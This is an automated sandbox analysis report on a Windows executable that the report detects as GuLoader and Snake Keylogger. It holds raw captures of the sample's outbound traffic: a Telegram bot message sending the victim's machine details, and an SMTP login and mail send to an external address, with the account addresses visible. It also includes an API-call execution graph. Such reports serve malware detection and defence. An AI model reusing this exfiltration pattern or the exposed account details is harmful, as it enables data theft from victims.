                                                                                                                                        2024-11-16 15:51:27 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                        Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        8192.168.2.551082188.114.97.34436256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-16 15:51:28 UTC63OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                        2024-11-16 15:51:28 UTC854INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:28 GMT
                                                                                                                                        Content-Type: text/xml
                                                                                                                                        Content-Length: 359
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                        Age: 24561
                                                                                                                                        Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWJJxbxu8uC5RCmEQqF3IMD6ZYvCE20Im8Mjf71sYOzkjOQpmGDWmUv8b%2FrcJLLxv%2FhdMuZZAVf%2BXuz24K72dF6G321Lksb0Km2e74uW9OVOmj2h%2Bcpww8qAVhx%2BR3zWZA9j40PL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 8e38a4845944a912-DFW
                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1474&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2065620&cwnd=159&unsent_bytes=0&cid=a94c65231bb5882d&ts=148&x=0"
                                                                                                                                        2024-11-16 15:51:28 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                        Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        9192.168.2.551083149.154.167.2204436256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-16 15:51:29 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20and%20Time:%2017/11/2024%20/%2001:14:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20473627%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                        Host: api.telegram.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-11-16 15:51:29 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:29 GMT
                                                                                                                                        Content-Type: application/json
                                                                                                                                        Content-Length: 55
                                                                                                                                        Connection: close
                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                        2024-11-16 15:51:29 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                        Nov 16, 2024 16:51:36.903776884 CET5875108437.27.123.72192.168.2.5220-server42.hndservers.net ESMTP Exim 4.98 #2 Sat, 16 Nov 2024 20:51:36 +0500
                                                                                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                        220 and/or bulk e-mail.
                                                                                                                                        Nov 16, 2024 16:51:36.904170990 CET51084587192.168.2.537.27.123.72EHLO 473627
                                                                                                                                        Nov 16, 2024 16:51:37.156805038 CET5875108437.27.123.72192.168.2.5250-server42.hndservers.net Hello 473627 [173.254.250.69]
                                                                                                                                        250-SIZE 104857600
                                                                                                                                        250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                                                                        250-8BITMIME
                                                                                                                                        250-PIPELINING
                                                                                                                                        250-PIPECONNECT
                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                        250-STARTTLS
                                                                                                                                        250 HELP
                                                                                                                                        Nov 16, 2024 16:51:37.158248901 CET51084587192.168.2.537.27.123.72AUTH login d2FqYWhhdEBmb29kZXguY29tLnBr
                                                                                                                                        Nov 16, 2024 16:51:37.410407066 CET5875108437.27.123.72192.168.2.5334 UGFzc3dvcmQ6
                                                                                                                                        Nov 16, 2024 16:51:37.711673975 CET5875108437.27.123.72192.168.2.5235 Authentication succeeded
                                                                                                                                        Nov 16, 2024 16:51:37.712052107 CET51084587192.168.2.537.27.123.72MAIL FROM:<wajahat@foodex.com.pk>
                                                                                                                                        Nov 16, 2024 16:51:37.964631081 CET5875108437.27.123.72192.168.2.5250 OK
                                                                                                                                        Nov 16, 2024 16:51:37.965051889 CET51084587192.168.2.537.27.123.72RCPT TO:<millions1000@proton.me>
                                                                                                                                        Nov 16, 2024 16:51:38.233315945 CET5875108437.27.123.72192.168.2.5250 Accepted
                                                                                                                                        Nov 16, 2024 16:51:38.233643055 CET51084587192.168.2.537.27.123.72DATA
                                                                                                                                        Nov 16, 2024 16:51:38.486479998 CET5875108437.27.123.72192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                                                                                        Nov 16, 2024 16:51:38.487607956 CET51084587192.168.2.537.27.123.72.
                                                                                                                                        Nov 16, 2024 16:51:39.065809011 CET5875108437.27.123.72192.168.2.5250 OK id=1tCL5G-0000000Dy09-2Di9

                                                                                                                                        Click to jump to process

                                                                                                                                        Click to jump to process

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Click to jump to process

                                                                                                                                        Target ID:0
                                                                                                                                        Start time:10:50:00
                                                                                                                                        Start date:16/11/2024
                                                                                                                                        Path:C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:833'904 bytes
                                                                                                                                        MD5 hash:A7071C7CF3999B13607413C36E8D5418
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2666489951.000000000839D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:4
                                                                                                                                        Start time:10:50:58
                                                                                                                                        Start date:16/11/2024
                                                                                                                                        Path:C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:833'904 bytes
                                                                                                                                        MD5 hash:A7071C7CF3999B13607413C36E8D5418
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:false

                                                                                                                                        Reset < >

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:19.6%
                                                                                                                                          Dynamic/Decrypted Code Coverage:15.2%
                                                                                                                                          Signature Coverage:18.9%
                                                                                                                                          Total number of Nodes:1510
                                                                                                                                          Total number of Limit Nodes:47
                                                                                                                                          execution_graph 4985 10001000 4988 1000101b 4985->4988 4995 1000152e 4988->4995 4990 10001020 4991 10001024 4990->4991 4992 10001027 GlobalAlloc 4990->4992 4993 10001555 3 API calls 4991->4993 4992->4991 4994 10001019 4993->4994 4996 10001243 3 API calls 4995->4996 4997 10001534 4996->4997 4998 1000153a 4997->4998 4999 10001546 GlobalFree 4997->4999 4998->4990 4999->4990 5000 401d41 GetDC GetDeviceCaps 5001 402b1d 18 API calls 5000->5001 5002 401d5f MulDiv ReleaseDC 5001->5002 5003 402b1d 18 API calls 5002->5003 5004 401d7e 5003->5004 5005 405f0c 18 API calls 5004->5005 5006 401db7 CreateFontIndirectW 5005->5006 5007 4024e8 5006->5007 5008 401a42 5009 402b1d 18 API calls 5008->5009 5010 401a48 5009->5010 5011 402b1d 18 API calls 5010->5011 5012 4019f0 5011->5012 5013 404243 lstrcpynW lstrlenW 5014 402746 5015 402741 5014->5015 5015->5014 5016 402756 FindNextFileW 5015->5016 5017 4027a8 5016->5017 5019 402761 5016->5019 5020 405eea lstrcpynW 5017->5020 5020->5019 5021 401cc6 5022 402b1d 18 API calls 5021->5022 5023 401cd9 SetWindowLongW 5022->5023 5024 4029c7 5023->5024 4135 401dc7 4143 402b1d 4135->4143 4137 401dcd 4138 402b1d 18 API calls 4137->4138 4139 401dd6 4138->4139 4140 401de8 EnableWindow 4139->4140 4141 401ddd ShowWindow 4139->4141 4142 4029c7 4140->4142 4141->4142 4144 405f0c 18 API calls 4143->4144 4145 402b31 4144->4145 4145->4137 5032 4045ca 5033 4045f6 5032->5033 5034 404607 5032->5034 5093 4056aa GetDlgItemTextW 5033->5093 5035 404613 GetDlgItem 5034->5035 5042 404672 5034->5042 5038 404627 5035->5038 5037 404601 5040 40617e 5 API calls 5037->5040 5041 40463b SetWindowTextW 5038->5041 5046 4059e0 4 API calls 5038->5046 5039 404756 5043 4048f7 5039->5043 5095 4056aa GetDlgItemTextW 5039->5095 5040->5034 5047 40412f 19 API calls 5041->5047 5042->5039 5042->5043 5048 405f0c 18 API calls 5042->5048 5045 404196 8 API calls 5043->5045 5050 40490b 5045->5050 5051 404631 5046->5051 5052 404657 5047->5052 5053 4046e6 SHBrowseForFolderW 5048->5053 5049 404786 5054 405a3d 18 API calls 5049->5054 5051->5041 5058 405935 3 API calls 5051->5058 5055 40412f 19 API calls 5052->5055 5053->5039 5056 4046fe CoTaskMemFree 5053->5056 5057 40478c 5054->5057 5059 404665 5055->5059 5060 405935 3 API calls 5056->5060 5096 405eea lstrcpynW 5057->5096 5058->5041 5094 404164 SendMessageW 5059->5094 5062 40470b 5060->5062 5065 404742 SetDlgItemTextW 5062->5065 5069 405f0c 18 API calls 5062->5069 5064 40466b 5067 406254 3 API calls 5064->5067 5065->5039 5066 4047a3 5068 406254 3 API calls 5066->5068 5067->5042 5076 4047ab 5068->5076 5070 40472a lstrcmpiW 5069->5070 5070->5065 5072 40473b lstrcatW 5070->5072 5071 4047ea 5097 405eea lstrcpynW 5071->5097 5072->5065 5074 4047f1 5075 4059e0 4 API calls 5074->5075 5077 4047f7 GetDiskFreeSpaceW 5075->5077 5076->5071 5080 405981 2 API calls 5076->5080 5081 40483c 5076->5081 5079 40481a MulDiv 5077->5079 5077->5081 5079->5081 5080->5076 5082 4048a6 5081->5082 5083 404978 21 API calls 5081->5083 5084 4048c9 5082->5084 5086 40140b 2 API calls 5082->5086 5085 404898 5083->5085 5098 404151 EnableWindow 5084->5098 5087 4048a8 SetDlgItemTextW 5085->5087 5088 40489d 5085->5088 5086->5084 5087->5082 5090 404978 21 API calls 5088->5090 5090->5082 5091 4048e5 5091->5043 5099 40455f 5091->5099 5093->5037 5094->5064 5095->5049 5096->5066 5097->5074 5098->5091 5100 404572 SendMessageW 5099->5100 5101 40456d 5099->5101 5100->5043 5101->5100 5102 401bca 5103 402b1d 18 API calls 5102->5103 5104 401bd1 5103->5104 5105 402b1d 18 API calls 5104->5105 5106 401bdb 5105->5106 5107 401beb 5106->5107 5108 402b3a 18 API calls 5106->5108 5109 401bfb 5107->5109 5110 402b3a 18 API calls 5107->5110 5108->5107 5111 401c06 5109->5111 5112 401c4a 5109->5112 5110->5109 5113 402b1d 18 API calls 5111->5113 5114 402b3a 18 API calls 5112->5114 5115 401c0b 5113->5115 5116 401c4f 5114->5116 5117 402b1d 18 API calls 5115->5117 5118 402b3a 18 API calls 5116->5118 5119 401c14 5117->5119 5120 401c58 FindWindowExW 5118->5120 5121 401c3a SendMessageW 5119->5121 5122 401c1c SendMessageTimeoutW 5119->5122 5123 401c7a 5120->5123 5121->5123 5122->5123 5124 40194b 5125 402b1d 18 API calls 5124->5125 5126 401952 5125->5126 5127 402b1d 18 API calls 5126->5127 5128 40195c 5127->5128 5129 402b3a 18 API calls 5128->5129 5130 401965 5129->5130 5131 401979 lstrlenW 5130->5131 5132 4019b5 5130->5132 5133 401983 5131->5133 5133->5132 5137 405eea lstrcpynW 5133->5137 5135 40199e 5135->5132 5136 4019ab lstrlenW 5135->5136 5136->5132 5137->5135 5141 4042cc 5143 4043fe 5141->5143 5144 4042e4 5141->5144 5142 404468 5145 404472 GetDlgItem 5142->5145 5146 40453a 5142->5146 5143->5142 5143->5146 5150 404439 GetDlgItem SendMessageW 5143->5150 5147 40412f 19 API calls 5144->5147 5148 4044fb 5145->5148 5149 40448c 5145->5149 5152 404196 8 API calls 5146->5152 5151 40434b 5147->5151 5148->5146 5153 40450d 5148->5153 5149->5148 5157 4044b2 6 API calls 5149->5157 5172 404151 EnableWindow 5150->5172 5155 40412f 19 API calls 5151->5155 5156 404535 5152->5156 5158 404523 5153->5158 5159 404513 SendMessageW 5153->5159 5161 404358 CheckDlgButton 5155->5161 5157->5148 5158->5156 5162 404529 SendMessageW 5158->5162 5159->5158 5160 404463 5163 40455f SendMessageW 5160->5163 5170 404151 EnableWindow 5161->5170 5162->5156 5163->5142 5165 404376 GetDlgItem 5171 404164 SendMessageW 5165->5171 5167 40438c SendMessageW 5168 4043b2 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5167->5168 5169 4043a9 GetSysColor 5167->5169 5168->5156 5169->5168 5170->5165 5171->5167 5172->5160 5173 4024cc 5174 402b3a 18 API calls 5173->5174 5175 4024d3 5174->5175 5178 405b56 GetFileAttributesW CreateFileW 5175->5178 5177 4024df 5178->5177 4187 1000278d 4188 100027dd 4187->4188 4189 1000279d VirtualProtect 4187->4189 4189->4188 5179 4019cf 5180 402b3a 18 API calls 5179->5180 5181 4019d6 5180->5181 5182 402b3a 18 API calls 5181->5182 5183 4019df 5182->5183 5184 4019e6 lstrcmpiW 5183->5184 5185 4019f8 lstrcmpW 5183->5185 5186 4019ec 5184->5186 5185->5186 4273 401e51 4274 402b3a 18 API calls 4273->4274 4275 401e57 4274->4275 4276 405194 25 API calls 4275->4276 4277 401e61 4276->4277 4291 405665 CreateProcessW 4277->4291 4280 401ec6 CloseHandle 4284 402793 4280->4284 4281 401e77 WaitForSingleObject 4282 401e89 4281->4282 4283 401e9b GetExitCodeProcess 4282->4283 4294 40628d 4282->4294 4285 401eba 4283->4285 4286 401ead 4283->4286 4285->4280 4289 401eb8 4285->4289 4298 405e31 wsprintfW 4286->4298 4289->4280 4292 401e67 4291->4292 4293 405694 CloseHandle 4291->4293 4292->4280 4292->4281 4292->4284 4293->4292 4295 4062aa PeekMessageW 4294->4295 4296 4062a0 DispatchMessageW 4295->4296 4297 401e90 WaitForSingleObject 4295->4297 4296->4295 4297->4282 4298->4289 4373 401752 4374 402b3a 18 API calls 4373->4374 4375 401759 4374->4375 4376 401781 4375->4376 4377 401779 4375->4377 4413 405eea lstrcpynW 4376->4413 4412 405eea lstrcpynW 4377->4412 4380 40177f 4384 40617e 5 API calls 4380->4384 4381 40178c 4382 405935 3 API calls 4381->4382 4383 401792 lstrcatW 4382->4383 4383->4380 4401 40179e 4384->4401 4385 40622d 2 API calls 4385->4401 4386 405b31 2 API calls 4386->4401 4388 4017b0 CompareFileTime 4388->4401 4389 401870 4391 405194 25 API calls 4389->4391 4390 401847 4392 405194 25 API calls 4390->4392 4410 40185c 4390->4410 4394 40187a 4391->4394 4392->4410 4393 405eea lstrcpynW 4393->4401 4395 403062 46 API calls 4394->4395 4396 40188d 4395->4396 4397 4018a1 SetFileTime 4396->4397 4398 4018b3 CloseHandle 4396->4398 4397->4398 4400 4018c4 4398->4400 4398->4410 4399 405f0c 18 API calls 4399->4401 4402 4018c9 4400->4402 4403 4018dc 4400->4403 4401->4385 4401->4386 4401->4388 4401->4389 4401->4390 4401->4393 4401->4399 4406 4056c6 MessageBoxIndirectW 4401->4406 4411 405b56 GetFileAttributesW CreateFileW 4401->4411 4404 405f0c 18 API calls 4402->4404 4405 405f0c 18 API calls 4403->4405 4407 4018d1 lstrcatW 4404->4407 4408 4018e4 4405->4408 4406->4401 4407->4408 4409 4056c6 MessageBoxIndirectW 4408->4409 4409->4410 4411->4401 4412->4380 4413->4381 4414 402253 4415 402261 4414->4415 4416 40225b 4414->4416 4417 40226f 4415->4417 4419 402b3a 18 API calls 4415->4419 4418 402b3a 18 API calls 4416->4418 4420 402b3a 18 API calls 4417->4420 4422 40227d 4417->4422 4418->4415 4419->4417 4420->4422 4421 402b3a 18 API calls 4423 402286 WritePrivateProfileStringW 4421->4423 4422->4421 5187 4052d3 5188 4052f4 GetDlgItem GetDlgItem GetDlgItem 5187->5188 5189 40547f 5187->5189 5232 404164 SendMessageW 5188->5232 5190 4054b0 5189->5190 5191 405488 GetDlgItem CreateThread CloseHandle 5189->5191 5194 4054db 5190->5194 5195 405500 5190->5195 5196 4054c7 ShowWindow ShowWindow 5190->5196 5191->5190 5193 405365 5198 40536c GetClientRect GetSystemMetrics SendMessageW SendMessageW 5193->5198 5197 40553b 5194->5197 5200 405515 ShowWindow 5194->5200 5201 4054ef 5194->5201 5202 404196 8 API calls 5195->5202 5234 404164 SendMessageW 5196->5234 5197->5195 5205 405549 SendMessageW 5197->5205 5203 4053db 5198->5203 5204 4053bf SendMessageW SendMessageW 5198->5204 5207 405535 5200->5207 5208 405527 5200->5208 5206 404108 SendMessageW 5201->5206 5213 40550e 5202->5213 5210 4053e0 SendMessageW 5203->5210 5211 4053ee 5203->5211 5204->5203 5212 405562 CreatePopupMenu 5205->5212 5205->5213 5206->5195 5209 404108 SendMessageW 5207->5209 5214 405194 25 API calls 5208->5214 5209->5197 5210->5211 5216 40412f 19 API calls 5211->5216 5215 405f0c 18 API calls 5212->5215 5214->5207 5217 405572 AppendMenuW 5215->5217 5218 4053fe 5216->5218 5219 4055a2 TrackPopupMenu 5217->5219 5220 40558f GetWindowRect 5217->5220 5221 405407 ShowWindow 5218->5221 5222 40543b GetDlgItem SendMessageW 5218->5222 5219->5213 5223 4055bd 5219->5223 5220->5219 5224 40542a 5221->5224 5225 40541d ShowWindow 5221->5225 5222->5213 5226 405462 SendMessageW SendMessageW 5222->5226 5227 4055d9 SendMessageW 5223->5227 5233 404164 SendMessageW 5224->5233 5225->5224 5226->5213 5227->5227 5228 4055f6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5227->5228 5230 40561b SendMessageW 5228->5230 5230->5230 5231 405644 GlobalUnlock SetClipboardData CloseClipboard 5230->5231 5231->5213 5232->5193 5233->5222 5234->5194 4424 402454 4425 402c44 19 API calls 4424->4425 4426 40245e 4425->4426 4427 402b1d 18 API calls 4426->4427 4428 402467 4427->4428 4429 402793 4428->4429 4430 40248b RegEnumValueW 4428->4430 4431 40247f RegEnumKeyW 4428->4431 4430->4429 4432 4024a4 RegCloseKey 4430->4432 4431->4432 4432->4429 5235 401ed4 5236 402b3a 18 API calls 5235->5236 5237 401edb 5236->5237 5238 40622d 2 API calls 5237->5238 5239 401ee1 5238->5239 5241 401ef2 5239->5241 5242 405e31 wsprintfW 5239->5242 5242->5241 4434 4022d5 4435 402305 4434->4435 4436 4022da 4434->4436 4437 402b3a 18 API calls 4435->4437 4438 402c44 19 API calls 4436->4438 4439 40230c 4437->4439 4440 4022e1 4438->4440 4447 402b7a RegOpenKeyExW 4439->4447 4441 4022eb 4440->4441 4446 402324 4440->4446 4442 402b3a 18 API calls 4441->4442 4443 4022f2 RegDeleteValueW RegCloseKey 4442->4443 4443->4446 4453 402ba5 4447->4453 4456 402322 4447->4456 4448 402bcb RegEnumKeyW 4449 402bdd RegCloseKey 4448->4449 4448->4453 4451 406254 3 API calls 4449->4451 4450 402c02 RegCloseKey 4450->4456 4454 402bed 4451->4454 4452 402b7a 3 API calls 4452->4453 4453->4448 4453->4449 4453->4450 4453->4452 4455 402c1d RegDeleteKeyW 4454->4455 4454->4456 4455->4456 4456->4446 4464 403c57 4465 403daa 4464->4465 4466 403c6f 4464->4466 4468 403dfb 4465->4468 4469 403dbb GetDlgItem GetDlgItem 4465->4469 4466->4465 4467 403c7b 4466->4467 4470 403c86 SetWindowPos 4467->4470 4471 403c99 4467->4471 4473 403e55 4468->4473 4478 401389 2 API calls 4468->4478 4472 40412f 19 API calls 4469->4472 4470->4471 4475 403cb6 4471->4475 4476 403c9e ShowWindow 4471->4476 4477 403de5 SetClassLongW 4472->4477 4474 40417b SendMessageW 4473->4474 4496 403da5 4473->4496 4503 403e67 4474->4503 4479 403cd8 4475->4479 4480 403cbe DestroyWindow 4475->4480 4476->4475 4481 40140b 2 API calls 4477->4481 4482 403e2d 4478->4482 4484 403cdd SetWindowLongW 4479->4484 4485 403cee 4479->4485 4483 4040d9 4480->4483 4481->4468 4482->4473 4488 403e31 SendMessageW 4482->4488 4494 4040e9 ShowWindow 4483->4494 4483->4496 4484->4496 4486 403d97 4485->4486 4487 403cfa GetDlgItem 4485->4487 4493 404196 8 API calls 4486->4493 4491 403d2a 4487->4491 4492 403d0d SendMessageW IsWindowEnabled 4487->4492 4488->4496 4489 40140b 2 API calls 4489->4503 4490 4040ba DestroyWindow EndDialog 4490->4483 4495 403d2f 4491->4495 4498 403d37 4491->4498 4499 403d7e SendMessageW 4491->4499 4500 403d4a 4491->4500 4492->4491 4492->4496 4493->4496 4494->4496 4538 404108 4495->4538 4497 405f0c 18 API calls 4497->4503 4498->4495 4498->4499 4499->4486 4504 403d52 4500->4504 4505 403d67 4500->4505 4502 40412f 19 API calls 4502->4503 4503->4489 4503->4490 4503->4496 4503->4497 4503->4502 4510 40412f 19 API calls 4503->4510 4525 403ffa DestroyWindow 4503->4525 4508 40140b 2 API calls 4504->4508 4507 40140b 2 API calls 4505->4507 4506 403d65 4506->4486 4509 403d6e 4507->4509 4508->4495 4509->4486 4509->4495 4511 403ee2 GetDlgItem 4510->4511 4512 403ef7 4511->4512 4513 403eff ShowWindow KiUserCallbackDispatcher 4511->4513 4512->4513 4535 404151 EnableWindow 4513->4535 4515 403f29 EnableWindow 4518 403f3d 4515->4518 4516 403f42 GetSystemMenu EnableMenuItem SendMessageW 4517 403f72 SendMessageW 4516->4517 4516->4518 4517->4518 4518->4516 4536 404164 SendMessageW 4518->4536 4537 405eea lstrcpynW 4518->4537 4521 403fa0 lstrlenW 4522 405f0c 18 API calls 4521->4522 4523 403fb6 SetWindowTextW 4522->4523 4524 401389 2 API calls 4523->4524 4524->4503 4525->4483 4526 404014 CreateDialogParamW 4525->4526 4526->4483 4527 404047 4526->4527 4528 40412f 19 API calls 4527->4528 4529 404052 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4528->4529 4530 401389 2 API calls 4529->4530 4531 404098 4530->4531 4531->4496 4532 4040a0 ShowWindow 4531->4532 4533 40417b SendMessageW 4532->4533 4534 4040b8 4533->4534 4534->4483 4535->4515 4536->4518 4537->4521 4539 404115 SendMessageW 4538->4539 4540 40410f 4538->4540 4539->4506 4540->4539 4541 4014d7 4542 402b1d 18 API calls 4541->4542 4543 4014dd Sleep 4542->4543 4545 4029c7 4543->4545 4762 40335a #17 SetErrorMode OleInitialize 4763 406254 3 API calls 4762->4763 4764 40339d SHGetFileInfoW 4763->4764 4835 405eea lstrcpynW 4764->4835 4766 4033c8 GetCommandLineW 4836 405eea lstrcpynW 4766->4836 4768 4033da GetModuleHandleW 4769 4033f2 4768->4769 4770 405962 CharNextW 4769->4770 4771 403401 CharNextW 4770->4771 4779 403411 4771->4779 4772 4034e6 4773 4034fa GetTempPathW 4772->4773 4837 403326 4773->4837 4775 403512 4776 403516 GetWindowsDirectoryW lstrcatW 4775->4776 4777 40356c DeleteFileW 4775->4777 4780 403326 11 API calls 4776->4780 4845 402dbc GetTickCount GetModuleFileNameW 4777->4845 4778 405962 CharNextW 4778->4779 4779->4772 4779->4778 4785 4034e8 4779->4785 4782 403532 4780->4782 4782->4777 4784 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4782->4784 4783 403580 4786 403618 4783->4786 4789 403608 4783->4789 4793 405962 CharNextW 4783->4793 4788 403326 11 API calls 4784->4788 4929 405eea lstrcpynW 4785->4929 4932 4037c2 4786->4932 4792 403564 4788->4792 4875 4038b4 4789->4875 4792->4777 4792->4786 4797 40359b 4793->4797 4795 403631 4798 4056c6 MessageBoxIndirectW 4795->4798 4796 403727 4799 4037aa ExitProcess 4796->4799 4804 406254 3 API calls 4796->4804 4802 4035e2 4797->4802 4803 403647 lstrcatW lstrcmpiW 4797->4803 4801 40363f ExitProcess 4798->4801 4805 405a3d 18 API calls 4802->4805 4803->4786 4806 403663 CreateDirectoryW SetCurrentDirectoryW 4803->4806 4807 403736 4804->4807 4809 4035ee 4805->4809 4810 403686 4806->4810 4811 40367b 4806->4811 4808 406254 3 API calls 4807->4808 4812 40373f 4808->4812 4809->4786 4930 405eea lstrcpynW 4809->4930 4942 405eea lstrcpynW 4810->4942 4941 405eea lstrcpynW 4811->4941 4815 406254 3 API calls 4812->4815 4817 403748 4815->4817 4819 403796 ExitWindowsEx 4817->4819 4824 403756 GetCurrentProcess 4817->4824 4818 4035fd 4931 405eea lstrcpynW 4818->4931 4819->4799 4822 4037a3 4819->4822 4821 405f0c 18 API calls 4823 4036c5 DeleteFileW 4821->4823 4825 40140b 2 API calls 4822->4825 4826 4036d2 CopyFileW 4823->4826 4832 403694 4823->4832 4829 403766 4824->4829 4825->4799 4826->4832 4827 40371b 4830 405d84 40 API calls 4827->4830 4828 405d84 40 API calls 4828->4832 4829->4819 4830->4786 4831 405f0c 18 API calls 4831->4832 4832->4821 4832->4827 4832->4828 4832->4831 4833 405665 2 API calls 4832->4833 4834 403706 CloseHandle 4832->4834 4833->4832 4834->4832 4835->4766 4836->4768 